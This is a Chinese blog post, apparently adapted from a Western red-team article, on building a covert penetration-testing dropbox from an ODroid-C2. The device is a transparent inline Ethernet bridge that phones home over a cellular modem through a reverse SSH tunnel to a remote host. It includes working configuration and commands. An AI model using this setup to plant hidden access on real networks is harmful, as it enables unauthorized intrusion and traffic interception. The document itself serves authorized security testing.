渗透测试Dropbox增强版:透明桥接与蜂窝网络回连技术

本文详细介绍了如何基于ODroid-C2平台构建增强型渗透测试Dropbox,包含透明网络桥接配置、蜂窝调制解调器拨号、反向SSH隧道建立及二层流量过滤技术,适用于红队渗透测试场景。

渗透测试Dropbox增强版

Joff Thyer//

许多读者可能已经阅读过Beau Bullock关于渗透测试dropbox的优秀博客文章。Beau提供了使用不同平台构建基础dropbox平台的详细指导。本文选择运行KALI(ARM)版的ODroid-C2平台,并在此基础上扩展重要功能。建议先阅读Beau的文章作为基础。

Beau的方案部署了临时接入点用于攻击者通信,但在多租户/多层建筑场景中,802.11可能无法覆盖。本文的改进方案包括:

  1. 增加两个以太网网卡实现透明桥接中间人(MiTM)能力
  2. 使用蜂窝调制解调器替代802.11 WiFi进行反向通道通信

透明桥接配置

透明桥接在红队场景中极为实用。只要dropbox配备电池,测试人员可快速将其部署在服务器/桌面系统与以太网墙插之间,并通过蜂窝网络建立反向SSH连接。

桥接解决方案需满足:

  • 转发ARP请求和0x0800类型IP以太网帧
  • 转发0x888E类型EAPOL帧(用于捕获非MACSEC的802.1X帧)
  • 禁用生成树协议

配置步骤:

1
2
3
4
5
6
7
8
9

# 安装桥接工具
apt-get update
apt-get install bridge-utils

# 创建桥接接口
brctl addbr br0
brctl addif br0 eth1
brctl addif br0 eth2
brctl stp br0 off

蜂窝调制解调器配置

需准备以下软件包:

1

apt-get install ppp wvdial usb-modeswitch

关键配置文件示例: /etc/wvdial.conf

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

[Dialer ting]
Init3 = AT+CGDCONT=1,"IP","wholesale"
Phone = *99#
IDSN = 0
Baud = 460800
Modem Type = Analog Modem
Stupid Mode = 1
Username = {blank}
Modem = /dev/ttyUSB0
Password = {blank}
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2

/etc/usb_modeswitch.conf

1
2
3
4

DisableSwitching=0
DefaultVendor = 0x12d1
DefaultProduct = 0x1506
MessageContent = 55534243000000000000000000000011060000000000000000000000000000

通过初始化脚本实现自动拨号:

1

wvdial ting >>/var/log/wvdial.log 2>&1 &

反向SSH隧道

生成ECDSA密钥并建立隧道:

1
2
3
4
5
6
7
8

# 生成密钥
ssh-keygen -t ecdsa

# 建立反向隧道
ssh root@255.99.99.99 -o TCPKeepAlive=yes -NTfR 2222:localhost:22

# 远程连接dropbox
ssh -p 2222 root@localhost

建议在/etc/ppp/ip-up.d目录放置自动启动脚本,并在服务端设置超时参数:

1
2

ClientAliveInterval 5
ClientAliveCountMax 3

数据包过滤与转发

安装过滤工具:

1

apt-get install arptables ebtables

网络接口配置(/etc/network/interfaces):

1
2
3
4
5
6
7
8
9

auto br0
iface br0 inet static
    address 169.254.1.1
    netmask 255.255.255.0
    bridge_ports eth1 eth2
    pre-up arptables -A OUTPUT -j DROP
    pre-up iptables -A OUTPUT -o br0 -j DROP
    pre-up ebtables -A OUTPUT -o br0 -d Multicast -j DROP
    post-up echo 8 >/sys/class/net/br0/bridge/group_fwd_mask

电源预算注意事项

实测功率消耗:

  • 完整系统:4700毫瓦
  • 移除蜂窝 modem:3000毫瓦
  • 移除所有网卡:2700毫瓦

建议使用至少2A(10000毫瓦)的电池供电,否则USB设备可能出现异常。

技术组件功率参考

  • 蜂窝调制解调器:1700毫瓦
  • USB网卡:150毫瓦/个
  • 802.11网卡:300-900毫瓦(预估)

通过物理公式验证:P(瓦特)= 电压 × 电流(5V × 1A = 5000毫瓦)

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次